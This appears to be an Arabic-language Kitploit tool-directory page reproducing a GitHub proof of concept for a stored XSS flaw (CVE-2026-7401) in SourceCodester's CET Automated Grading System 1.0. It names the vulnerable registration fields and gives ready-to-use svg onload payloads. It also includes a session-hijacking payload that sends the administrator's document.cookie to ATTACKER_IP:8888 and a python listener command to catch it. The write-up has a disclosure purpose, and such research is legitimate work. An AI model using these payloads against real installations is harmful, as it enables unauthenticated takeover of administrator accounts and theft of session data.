Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-7401-XSS — إثبات مفهوم لثغرة XSS مخزنة في نظام التقدير الآلي CET من SourceCodester الإصدار 1.0، يوضح حقن حمولة دون مصادقة عبر تسجيل الطلاب مما يؤدي إلى اختطاف جلسة المسؤول. | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-7401-xss
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

إثبات مفهوم لثغرة XSS مخزنة في نظام التقدير الآلي CET من SourceCodester الإصدار 1.0، يوضح حقن حمولة دون مصادقة عبر تسجيل الطلاب مما يؤدي إلى اختطاف جلسة المسؤول.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة XSS مخزنة في نظام التقييم الآلي CET — تسجيل الطلاب (بدون مصادقة → لوحة تحكم المسؤول)

التفاصيل

الحقلالقيمة
البائعSourceCodester
رابط البائعhttps://www.sourcecodester.com
المنتجنظام التقييم الآلي CET مع التحليلات التنبؤية بالذكاء الاصطناعي في PHP وMySQL
رابط المنتجhttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
الإصدار1.0
الثغرةالبرمجة النصية عبر المواقع المخزنة (XSS)
CWECWE-79
درجة CVSSv38.8 (عالية)
ناقل الهجومالشبكة
المصادقة المطلوبةلا شيء (التسجيل الذاتي للطلاب عام)
الضحيةالمسؤول
تفاعل المستخدممطلوب (يزور المسؤول لوحة التحكم)
الباحثعماد علوي
التاريخ2026-04-13

المكوّن المتأثر

الملف: PersonalAGS/index.php?action=register (تسجيل الطلاب)
المعلمات: student_id, full_name, section, username (POST)
يتم التشغيل عند: PersonalAGS/index.php?action=dashboard (لوحة تحكم المسؤول)


الوصف

يفشل بوابة التسجيل الذاتي للطلاب في نظام التقييم الآلي CET الإصدار 1.0 في تعقيم أو ترميز مدخلات المستخدم قبل تخزينها في قاعدة البيانات. يمكن لمهاجم غير مصادق تسجيل حساب طالب مع حقن حمولات JavaScript في أي حقل تسجيل. يتم تخزين الحمولة الخبيثة في قاعدة البيانات وتنفيذها في متصفح أي مسؤول يزور لوحة التحكم حيث يتم عرض الطلاب المسجلين.

هذه سلسلة هجوم حرجة — لا تتطلب أي مصادقة لحقن الحمولة، لكنها تُنفذ في سياق مسؤول متميز، مما يتيح سرقة ملفات تعريف الارتباط للجلسة والاستيلاء الكامل على حساب المسؤول.


إثبات المفهوم

الخطوة 1 — الانتقال إلى تسجيل الطلاب (بدون مصادقة مطلوبة)

انتقل إلى صفحة التسجيل الذاتي العامة للطلاب:

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

الخطوة 2 — حقن حمولة XSS في حقول التسجيل

املأ جميع الحقول بحمولات XSS وانقر على تسجيل الحساب:

  • رقم هوية الطالب: "><svg onload=alert(1)>
  • الاسم الكامل: "><svg onload=alert(1)>
  • القسم: "><svg onload=alert(1)>
  • اسم المستخدم المطلوب: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

نجاح التسجيل — يتم تخزين الحمولات في قاعدة البيانات.

الخطوة 3 — تنفيذ XSS على لوحة تحكم المسؤول

عندما يسجل المسؤول الدخول ويزور لوحة التحكم، يتم تنفيذ الحمولة المحقونة فورًا. تظهر نافذة التنبيه المنبثقة ويكون تخطيط الصفحة مكسورًا بشكل واضح بسبب HTML المحقون — مما يؤكد أن الحمولة تُعرض دون تعقيم في لوحة تحكم المسؤول.

تعكس عناوين أقسام لوحة التحكم أيضًا القيم المحقونة:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

حمولة اختطاف الجلسة

يمكن للمهاجم تصعيد هذا إلى اختطاف كامل لجلسة المسؤول باستخدام الحمولة التالية في حقول التسجيل:

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

قم بإعداد مستمع على جهاز المهاجم:

root@kitploit:~
python3 -m http.server 8888

عندما يزور المسؤول لوحة التحكم، يتم إرسال ملف تعريف الارتباط الخاص بجلسته إلى خادم المهاجم، مما يتيح الاستيلاء الكامل على الحساب.


التأثير

يمكن لمهاجم غير مصادق:

  • حقن JavaScript دائم في لوحة تحكم المسؤول عبر التسجيل العام للطلاب
  • سرقة ملف تعريف الارتباط الخاص بجلسة المسؤول والاستيلاء على حساب المسؤول
  • تنفيذ أي إجراء إداري نيابة عن الضحية
  • إعادة توجيه المسؤولين إلى صفحات خبيثة
  • تشويه لوحة تحكم المسؤول

لا تتطلب أي مصادقة لحقن الحمولة. يتم تنفيذ الهجوم تلقائيًا عندما يزور أي مسؤول لوحة التحكم.


المراجع

  • SourceCodester — نظام التقييم الآلي CET
  • CWE-79: التعقيم غير السليم للمدخلات أثناء توليد صفحة الويب.
تنزيل الأداة